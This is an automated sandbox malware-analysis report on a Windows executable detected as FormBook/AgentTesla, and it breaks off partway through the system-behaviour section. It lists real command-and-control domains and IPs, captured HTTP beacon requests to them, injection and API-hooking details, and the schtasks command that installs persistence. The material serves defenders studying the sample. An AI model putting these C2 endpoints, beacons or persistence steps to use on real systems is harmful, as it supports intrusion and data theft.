          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 712 | Rootkit 1 | Credential API Hooking 1 | Query Registry 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Masquerading 1 | LSASS Memory | Security Software Discovery 331 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 41 | NTDS | Virtualization/Sandbox Evasion 41 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 712 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing 3 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 383962, Sample: gzU8odwaPalRTGB.exe, Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100]

          Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 11 other signatures

          Process tree:

          gzU8odwaPalRTGB.exe (started)
            Dropped: C:\Users\user\AppData\...\fgEePtnFJH.exe, PE32
            Dropped: C:\Users\...\fgEePtnFJH.exe:Zone.Identifier, ASCII
            Dropped: C:\Users\user\AppData\Local\...\tmpDFE8.tmp, XML
            Dropped: C:\Users\user\...\gzU8odwaPalRTGB.exe.log, ASCII
            Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Injects a PE file into a foreign processes
            RegSvcs.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
              explorer.exe (injected)
                DNS/IP: www.realsults.com 154.203.184.76, 49724, 80 HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK Seychelles
                DNS/IP: www.novergi.com 162.0.213.203, 49717, 80 ACPCA Canada
                DNS/IP: www.primarewards.net
                Signatures: System process connects to network (likely due to code injection or exploit)
                rundll32.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  cmd.exe (started)
                    conhost.exe (started)
            schtasks.exe (started)
              conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          gzU8odwaPalRTGB.exe | 29% | ReversingLabs | Win32.Trojan.AgentTesla
          gzU8odwaPalRTGB.exe | 100% | Avira | HEUR/AGEN.1138557
          gzU8odwaPalRTGB.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\fgEePtnFJH.exe | 100% | Avira | HEUR/AGEN.1138557
          C:\Users\user\AppData\Roaming\fgEePtnFJH.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\fgEePtnFJH.exe | 29% | ReversingLabs | Win32.Trojan.AgentTesla

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.0.gzU8odwaPalRTGB.exe.d50000.0.unpack | 100% | Avira | HEUR/AGEN.1138557
          0.2.gzU8odwaPalRTGB.exe.d50000.0.unpack | 100% | Avira | HEUR/AGEN.1138557
          5.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.novergi.com | 162.0.213.203 | true | true | | unknown
          www.realsults.com | 154.203.184.76 | true | true | | unknown
          www.primarewards.net | unknown | unknown | true | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                www.smarttel.management/msc/ | true | Avira URL Cloud: safe | low
                http://www.novergi.com/msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp | true | Avira URL Cloud: safe | unknown
                http://www.realsults.com/msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries


                                        Contacted IPs


                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        162.0.213.203 | www.novergi.com | Canada | 35893 | ACPCA | true
                                        154.203.184.76 | www.realsults.com | Seychelles | 139646 | HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK | true

                                        General Information

                                        Joe Sandbox Version: 31.0.0 Emerald
                                        Analysis ID: 383962
                                        Start date: 08.04.2021
                                        Start time: 13:11:12
                                        Joe Sandbox Product: CloudBasic
                                        Overall analysis duration: 0h 11m 29s
                                        Hypervisor based Inspection enabled: false
                                        Report type: full
                                        Sample file name: gzU8odwaPalRTGB.exe
                                        Cookbook file name: default.jbs
                                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed: 30
                                        Number of new started drivers analysed: 0
                                        Number of existing processes analysed: 0
                                        Number of existing drivers analysed: 0
                                        Number of injected processes analysed: 1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode: default
                                        Analysis stop reason: Timeout
                                        Detection: MAL
                                        Classification: mal100.troj.evad.winEXE@10/4@3/2
                                        EGA Information: Failed
                                        HDC Information:
                                        • Successful, ratio: 59.7% (good quality ratio 54.4%)
                                        • Quality average: 72.8%
                                        • Quality standard deviation: 31.3%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 153
                                        • Number of non-executed functions: 151
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.255.188.83, 104.42.151.234, 23.54.113.53, 52.147.198.201, 92.122.144.200, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 20.54.26.129
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383962/sample/gzU8odwaPalRTGB.exe

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        13:12:14 | API Interceptor | 1x Sleep call for process: gzU8odwaPalRTGB.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        Match | Associated Sample Name / URL | Detection | Context
                                        162.0.213.203 | yxQWzvifFe.exe | malicious | www.novergi.com/gts/?8p=2dRTAnw8b&uDHXm=yLPfVdgI065g3WM79VbgSaNay6zP4KCNC6LcPfTfXYj/FN8kZL3TM6YFBfxkmCiyo0tD
                                        162.0.213.203 | SCAN_20210115140930669.exe | malicious | www.novergi.com/2kf/?MXEXp=Xbi8qH9H3Z9HCTO0&h0DhCtA=+0IOzSX8qprA1N1aLTdovlGjKwnvHfXYWHF/NiQugPBJRNBEpFSy7sOoCUWCTacUo6UP
                                        162.0.213.203 | Order (2021.01.06).exe | malicious | www.novergi.com/2kf/?IR9pb4=+0IOzSX8qprA1N1aLTdovlGjKwnvHfXYWHF/NiQugPBJRNBEpFSy7sOoCX24DL8syd1I&4h=NTlpi0

                                        Domains

                                        Match | Associated Sample Name / URL | Detection | Context
                                        www.novergi.com | yxQWzvifFe.exe | malicious | 162.0.213.203
                                        www.novergi.com | SCAN_20210115140930669.exe | malicious | 162.0.213.203
                                        www.novergi.com | Order (2021.01.06).exe | malicious | 162.0.213.203

                                        ASN


                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gzU8odwaPalRTGB.exe.log
                                        Process: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
                                        File Type: ASCII text, with CRLF line terminators
                                        Category: modified
                                        Size (bytes): 1314
                                        Entropy (8bit): 5.350128552078965
                                        Encrypted: false
                                        SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                        MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
                                        SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                        SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                        SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                        Malicious: true
                                        Reputation: high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp
                                        Process:C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1647
                                        Entropy (8bit):5.169458475171501
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3IT
                                        MD5:43D09D99A1183D27D8BD6C31F7FB6416
                                        SHA1:647674277B12D074FFE749E4CA879985ABA38A5E
                                        SHA-256:53CE83C8B03890F5037D9B9CA3EF2B1438760AD61C5BD90020C82EE7C02AA6EA
                                        SHA-512:A9B61EF73EB67886E79057F52AD2B8976CB408998B987448F5BC048613D5E0FC8825665A5D7191B6AD868E7300F20DF2DFE17A2DDF9FC3D507E3A733B36E2CE1
                                        Malicious:true
                                        Reputation:low
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                        C:\Users\user\AppData\Roaming\fgEePtnFJH.exe
                                        Process:C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):659456
                                        Entropy (8bit):7.6004326422021
                                        Encrypted:false
                                        SSDEEP:12288:/0u4sFfsLEPk2K+xaEMJpxhgiYv3Y/McfQ5WOiOP5DPh6h:/0u4csWki4EUpxhlYv+6WOi45l
                                        MD5:BC0859493D8419F5FFE0468D23938256
                                        SHA1:70C3B42DB2FC29BB0DE21DB911B85ADF600FB9F2
                                        SHA-256:64F1791681E261B0E652130F8F7FCA8E1098A4C03FEE49652A14D682681F85CF
                                        SHA-512:BF6CC0550EC21E2E4F829552A289D2E0414FD8DA1085E5E48588A114C6B2A4CB0ED3869513DA89E4FD5172A40AEAA2206578F53F867119CB8E8342CEC9292927
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 29%
                                        Reputation:low
                                        C:\Users\user\AppData\Roaming\fgEePtnFJH.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.6004326422021
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:gzU8odwaPalRTGB.exe
                                        File size:659456
                                        MD5:bc0859493d8419f5ffe0468d23938256
                                        SHA1:70c3b42db2fc29bb0de21db911b85adf600fb9f2
                                        SHA256:64f1791681e261b0e652130f8f7fca8e1098a4c03fee49652a14d682681f85cf
                                        SHA512:bf6cc0550ec21e2e4f829552a289d2e0414fd8da1085e5e48588a114c6b2a4cb0ed3869513da89e4fd5172a40aeaa2206578f53f867119cb8e8342cec9292927
                                        SSDEEP:12288:/0u4sFfsLEPk2K+xaEMJpxhgiYv3Y/McfQ5WOiOP5DPh6h:/0u4csWki4EUpxhlYv+6WOi45l

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4a1f32
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x606E9095 [Thu Apr 8 05:11:49 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa1ee0 | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x5e4 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xa0468 | 0xa0600 | False | 0.778837137081 | data | 7.60992842493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xa4000 | 0x5e4 | 0x600 | False | 0.427083333333 | data | 4.15888435005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xa6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_VERSION | 0xa4090 | 0x354 | data | |
                                        RT_MANIFEST | 0xa43f4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

                                        DLL | Import
                                        mscoree.dll | _CorExeMain

                                        Version Infos

                                        Description | Data
                                        Translation | 0x0000 0x04b0
                                        LegalCopyright | Copyright 2015
                                        Assembly Version | 1.0.0.0
                                        InternalName | ExceptionFromErrorCode.exe
                                        FileVersion | 1.0.0.0
                                        CompanyName |
                                        LegalTrademarks |
                                        Comments |
                                        ProductName | Codewords
                                        ProductVersion | 1.0.0.0
                                        FileDescription | Codewords
                                        OriginalFilename | ExceptionFromErrorCode.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets


                                        UDP Packets


                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Apr 8, 2021 13:13:25.104145050 CEST | 192.168.2.5 | 8.8.8.8 | 0x29fc | Standard query (0) | www.novergi.com | A (IP address) | IN (0x0001)
                                        Apr 8, 2021 13:13:45.827178955 CEST | 192.168.2.5 | 8.8.8.8 | 0xdbf5 | Standard query (0) | www.realsults.com | A (IP address) | IN (0x0001)
                                        Apr 8, 2021 13:14:05.960927963 CEST | 192.168.2.5 | 8.8.8.8 | 0x4b1a | Standard query (0) | www.primarewards.net | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Apr 8, 2021 13:13:25.148941040 CEST | 8.8.8.8 | 192.168.2.5 | 0x29fc | No error (0) | www.novergi.com | | 162.0.213.203 | A (IP address) | IN (0x0001)
                                        Apr 8, 2021 13:13:46.156172037 CEST | 8.8.8.8 | 192.168.2.5 | 0xdbf5 | No error (0) | www.realsults.com | | 154.203.184.76 | A (IP address) | IN (0x0001)
                                        Apr 8, 2021 13:14:06.304905891 CEST | 8.8.8.8 | 192.168.2.5 | 0x4b1a | Server failure (2) | www.primarewards.net | none | none | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.novergi.com
                                        • www.realsults.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.5 | 49717 | 162.0.213.203 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Apr 8, 2021 13:13:25.332544088 CEST | 1208 | OUT | GET /msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1
                                        Host: www.novergi.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Apr 8, 2021 13:13:25.626167059 CEST | 1209 | IN | HTTP/1.1 404 Not Found
                                        Date: Thu, 08 Apr 2021 11:13:25 GMT
                                        Server: Apache/2.4.29 (Ubuntu)
                                        Content-Length: 327
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /msc/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.5 | 49724 | 154.203.184.76 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Apr 8, 2021 13:13:47.295574903 CEST | 4469 | OUT | GET /msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1
                                        Host: www.realsults.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Apr 8, 2021 13:13:48.450500965 CEST | 4470 | IN | HTTP/1.1 404 Not Found
                                        Content-Type: text/html
                                        Server: Microsoft-IIS/8.5
                                        Date: Thu, 08 Apr 2021 11:13:46 GMT
                                        Connection: close
                                        Content-Length: 1163
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA | INLINE | explorer.exe
                                        PeekMessageW | INLINE | explorer.exe
                                        GetMessageW | INLINE | explorer.exe
                                        GetMessageA | INLINE | explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function Name | Hook Type | New Data
                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6

                                        System Behavior

                                        General

                                        Start time:13:12:06
                                        Start date:08/04/2021
                                        Path:C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe'
                                        Imagebase:0xd50000
                                        File size:659456 bytes
                                        MD5 hash:BC0859493D8419F5FFE0468D23938256
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:12:16
                                        Start date:08/04/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'
                                        Imagebase:0x910000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:12:17
                                        Start date:08/04/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
